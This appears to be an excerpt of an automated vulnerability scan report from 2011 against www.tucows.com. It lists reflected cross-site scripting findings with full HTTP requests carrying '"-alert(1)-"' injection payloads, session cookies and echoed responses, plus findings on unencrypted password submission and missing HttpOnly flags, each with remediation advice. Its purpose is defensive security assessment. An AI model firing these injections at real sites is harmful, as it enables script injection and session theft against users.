GET /sitemap.html?95630"-alert(1)-"ad45798eea4=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:31:35 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 284587
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6930b"-alert(1)-"88848db90c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html6930b"-alert(1)-"88848db90c4 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:14 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.155. http://www.tucows.com/software.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/software.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89730"-alert(1)-"ede5d633695 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?89730"-alert(1)-"ede5d633695=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:49 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 49601
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the pf request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36557"-alert(1)-"b121e4a791 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689&pf=win36557"-alert(1)-"b121e4a791 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 55803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91d8"-alert(1)-"32c743300b4 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /software.html?t=689d91d8"-alert(1)-"32c743300b4&pf=win HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:44 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVDWt9eDsgAvDivKt0Eex6B0RPBHeE1vxYfjLZMpBZlW7bjlV79Z3QWdkzy6r7qpr%2BTJUX7x9ThxdXpMo6KMFZWyrMA2IUCivRn8fEr2dY2En; path=/ Connection: close Content-Type: text/html Content-Length: 55720
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Download Windows Fre ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc4ae"-alert(1)-"f753e1f604a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.htmlfc4ae"-alert(1)-"f753e1f604a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.159. http://www.tucows.com/terms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/terms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ed39"-alert(1)-"d3cf4b9dbed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms.html?2ed39"-alert(1)-"d3cf4b9dbed=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:28:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 38731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 436cb"-alert(1)-"c0ec75e5035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoegg436cb"-alert(1)-"c0ec75e5035/ad.html HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:02 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97844"-alert(1)-"e3ce1315cea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /advertise.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
